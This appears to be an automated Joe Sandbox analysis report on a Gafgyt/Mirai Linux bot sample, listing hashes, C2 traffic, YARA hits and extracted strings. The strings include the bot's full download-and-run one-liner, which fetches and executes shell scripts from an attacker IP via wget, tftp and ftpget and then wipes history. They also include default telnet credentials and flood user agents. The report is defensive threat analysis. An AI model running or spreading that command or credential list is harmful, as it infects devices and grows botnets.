Edit tour

Linux Analysis Report
sshd.elf

Overview

General Information

Sample name:sshd.elf
Analysis ID:1650657
MD5:8c184e48a5a22b3444fcb029391d7e91
SHA1:cde922465869cc7f84d0ad315276594363b7f834
SHA256:44d4a2750bfcb8a436106ea06f92a3062660d24e3d48dc1d2d4e2479150dc806
Tags:elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai
Score:84
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Yara detected Mirai
Opens /proc/net/* files useful for finding connected devices and routers
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are user agent strings indicative of HTTP manipulation
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1650657
Start date and time:2025-03-27 22:04:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 15s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sshd.elf
Detection:MAL
Classification:mal84.spre.troj.linELF@0/0@2/0
  • VT rate limit hit for: http://46.101.35.30/shitty.sh;
Command:/tmp/sshd.elf
PID:5437
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • sshd.elf (PID: 5437, Parent: 5357, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/sshd.elf
    • sshd.elf New Fork (PID: 5439, Parent: 5437)
      • sshd.elf New Fork (PID: 5441, Parent: 5439)
  • dash New Fork (PID: 5447, Parent: 3585)
  • rm (PID: 5447, Parent: 3585, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhV
  • dash New Fork (PID: 5448, Parent: 3585)
  • cat (PID: 5448, Parent: 3585, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.n2YaaptlPb
  • dash New Fork (PID: 5449, Parent: 3585)
  • head (PID: 5449, Parent: 3585, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5450, Parent: 3585)
  • tr (PID: 5450, Parent: 3585, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5451, Parent: 3585)
  • cut (PID: 5451, Parent: 3585, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5452, Parent: 3585)
  • cat (PID: 5452, Parent: 3585, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.n2YaaptlPb
  • dash New Fork (PID: 5453, Parent: 3585)
  • head (PID: 5453, Parent: 3585, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 5454, Parent: 3585)
  • tr (PID: 5454, Parent: 3585, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 5455, Parent: 3585)
  • cut (PID: 5455, Parent: 3585, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 5458, Parent: 3585)
  • rm (PID: 5458, Parent: 3585, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhV
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
sshd.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    sshd.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5437.1.00007f9f78400000.00007f9f78421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        5439.1.00007f9f78400000.00007f9f78421000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: sshd.elfAvira: detected
          Source: sshd.elfMalware Configuration Extractor: Gafgyt {"C2 url": "93.115.172.234:6667"}
          Source: sshd.elfReversingLabs: Detection: 66%
          Source: unknownHTTPS traffic detected: 34.254.182.186:443 -> 192.168.2.13:54636 version: TLS 1.2

          Spreading

          barindex
          Source: /tmp/sshd.elf (PID: 5437)Opens: /proc/net/routeJump to behavior
          Source: global trafficTCP traffic: 192.168.2.13:60886 -> 93.115.172.234:6667
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 34.254.182.186
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownTCP traffic detected without corresponding DNS query: 93.115.172.234
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
          Source: sshd.elfString found in binary or memory: http://46.101.35.30/shitty.sh;
          Source: sshd.elfString found in binary or memory: http://93.115.172.234/bins.sh;
          Source: sshd.elfString found in binary or memory: http://about.ask.com/en/docs/about/webmasters.shtml)
          Source: sshd.elfString found in binary or memory: http://code.google.com/appengine;
          Source: sshd.elfString found in binary or memory: http://fast.no/support/crawler.asp)
          Source: sshd.elfString found in binary or memory: http://feedback.redkolibri.com/
          Source: sshd.elfString found in binary or memory: http://help.yahoo.com/help/us/shop/merchant/)
          Source: sshd.elfString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
          Source: sshd.elfString found in binary or memory: http://majestic12.co.uk/bot.php?
          Source: sshd.elfString found in binary or memory: http://search.msn.com/msnbot.htm)
          Source: sshd.elfString found in binary or memory: http://sp.ask.com/docs/about/tech_crawling.html)
          Source: sshd.elfString found in binary or memory: http://tinyurl.com/64t5n)
          Source: sshd.elfString found in binary or memory: http://w.moreover.com;
          Source: sshd.elfString found in binary or memory: http://wortschatz.uni-leipzig.de/findlinks/)
          Source: sshd.elfString found in binary or memory: http://www.80legs.com/webcrawler.html)
          Source: sshd.elfString found in binary or memory: http://www.WISEnutbot.com)
          Source: sshd.elfString found in binary or memory: http://www.baidu.com/search/spider.htm)
          Source: sshd.elfString found in binary or memory: http://www.baidu.com/search/spider.html)
          Source: sshd.elfString found in binary or memory: http://www.become.com/site_owners.html)
          Source: sshd.elfString found in binary or memory: http://www.beslist.nl/
          Source: sshd.elfString found in binary or memory: http://www.billybobbot.com/crawler/)
          Source: sshd.elfString found in binary or memory: http://www.brandwatch.net)
          Source: sshd.elfString found in binary or memory: http://www.chainn.com/mxbot.html)
          Source: sshd.elfString found in binary or memory: http://www.gigablast.com/spider.html)
          Source: sshd.elfString found in binary or memory: http://www.google.com/bot.html)
          Source: sshd.elfString found in binary or memory: http://www.google.com/feedfetcher.html;
          Source: sshd.elfString found in binary or memory: http://www.googlebot.com/bot.html)
          Source: sshd.elfString found in binary or memory: http://www.huaweisymantec.com/en/IRL/spider)
          Source: sshd.elfString found in binary or memory: http://www.majestic12.co.uk/bot.php?
          Source: sshd.elfString found in binary or memory: http://www.mojeek.com/bot.html)
          Source: sshd.elfString found in binary or memory: http://www.moreover.com;
          Source: sshd.elfString found in binary or memory: http://www.sogou.com/docs/help/webmasters.htm#07)
          Source: sshd.elfString found in binary or memory: http://www.terrawiz.com/bot.html)
          Source: sshd.elfString found in binary or memory: http://www.yodao.com/help/webmaster/spider/;
          Source: unknownNetwork traffic detected: HTTP traffic on port 54636 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54636
          Source: unknownHTTPS traffic detected: 34.254.182.186:443 -> 192.168.2.13:54636 version: TLS 1.2
          Source: sshd.elfELF static info symbol of initial sample: TelnetScanner
          Source: sshd.elfELF static info symbol of initial sample: passwords
          Source: sshd.elfELF static info symbol of initial sample: usernames
          Source: Initial sampleString containing 'busybox' found: busyboxterrorist
          Source: Initial sampleString containing 'busybox' found: busybox
          Source: Initial sampleString containing 'busybox' found: 'mipsmipselsh4x86i686ppci586jackmy*hackmy*arm*b1b2b3b4b5b6b7b8b9busyboxterroristDFhxdhdfdvrHelperFDFDHFCFEUBFTUdftuiGHfjfgvjjhUOHJIPJIPJjJIPJuipjhkmyx86_64lolmipselRYrydrytel*TwoFace*UYyuyioywgetx86_64XDzdfxzfxxb*sh1234567891011121314151617181920hackzbin*gtopftp*tftp*botnetswatnetballpitfucknetcracknetweednetgaynetqueernetballnetunetyougaysttftpsstftpsbtftpbtftpy0u1sg3ybruv*IoT*93.115.172.234:6667cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.115.172.234/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 93.115.172.234 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 93.115.172.234; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 93.115.172.234 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;history -c
          Source: Initial sampleString containing 'busybox' found: telnetadminsupportdaemondefault666666rootsupervisoruser1111servicetestpasswordankotiniZte521vizxvzyad12341234qweroelinux123/dev/netslink//tmp//var//dev//var/run//dev/shm//mnt//boot//usr//opt/:oginsernameasswordnvalidailedncorrecteniedrroroodbyebadbusybox$#(null)/bin/sh-c
          Source: classification engineClassification label: mal84.spre.troj.linELF@0/0@2/0
          Source: sshd.elfELF static info symbol of initial sample: libc/string/mips/memcpy.S
          Source: sshd.elfELF static info symbol of initial sample: libc/string/mips/memset.S
          Source: sshd.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crt1.S
          Source: sshd.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crti.S
          Source: sshd.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/crtn.S
          Source: sshd.elfELF static info symbol of initial sample: libc/sysdeps/linux/mips/pipe.S
          Source: /usr/bin/dash (PID: 5447)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhVJump to behavior
          Source: /usr/bin/dash (PID: 5458)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.n2YaaptlPb /tmp/tmp.dwf0pdHIMv /tmp/tmp.peWuOPTNhVJump to behavior
          Source: /tmp/sshd.elf (PID: 5437)Queries kernel information via 'uname': Jump to behavior
          Source: sshd.elf, 5437.1.000055ef4ab5d000.000055ef4abe4000.rw-.sdmp, sshd.elf, 5439.1.000055ef4ab5d000.000055ef4abe4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
          Source: sshd.elf, 5437.1.00007ffd741d3000.00007ffd741f4000.rw-.sdmp, sshd.elf, 5439.1.00007ffd741d3000.00007ffd741f4000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/sshd.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sshd.elf
          Source: sshd.elf, 5437.1.000055ef4ab5d000.000055ef4abe4000.rw-.sdmp, sshd.elf, 5439.1.000055ef4ab5d000.000055ef4abe4000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
          Source: sshd.elf, 5437.1.00007ffd741d3000.00007ffd741f4000.rw-.sdmp, sshd.elf, 5439.1.00007ffd741d3000.00007ffd741f4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: sshd.elf, type: SAMPLE
          Source: Yara matchFile source: sshd.elf, type: SAMPLE
          Source: Yara matchFile source: 5437.1.00007f9f78400000.00007f9f78421000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 5439.1.00007f9f78400000.00007f9f78421000.r-x.sdmp, type: MEMORY
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
          Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
          Source: Initial sampleUser agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
          Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
          Source: Initial sampleUser agent string found: Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
          Source: Initial sampleUser agent string found: Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.97 Safari/537.22 Perk/3.3.0.0
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
          Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.10
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.5.24 Version/10.52
          Source: Initial sampleUser agent string found: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.13918/19.752; U; ru) Presto/2.6.25
          Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 6.0; U; ru) Presto/2.5.22 Version/10.50
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:24.0) Gecko/20100101 Firefox/24.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPad; U; CPU OS 5_1 like Mac OS X) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B367 Safari/531.21.10 UCBrowser/3.4.3.532
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7pre) Gecko/20100925 Firefox/4.0b7pre
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.27 Safari/536.11
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
          Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.3
          Source: Initial sampleUser agent string found: Mozilla/5.0 (iPad; CPU OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1
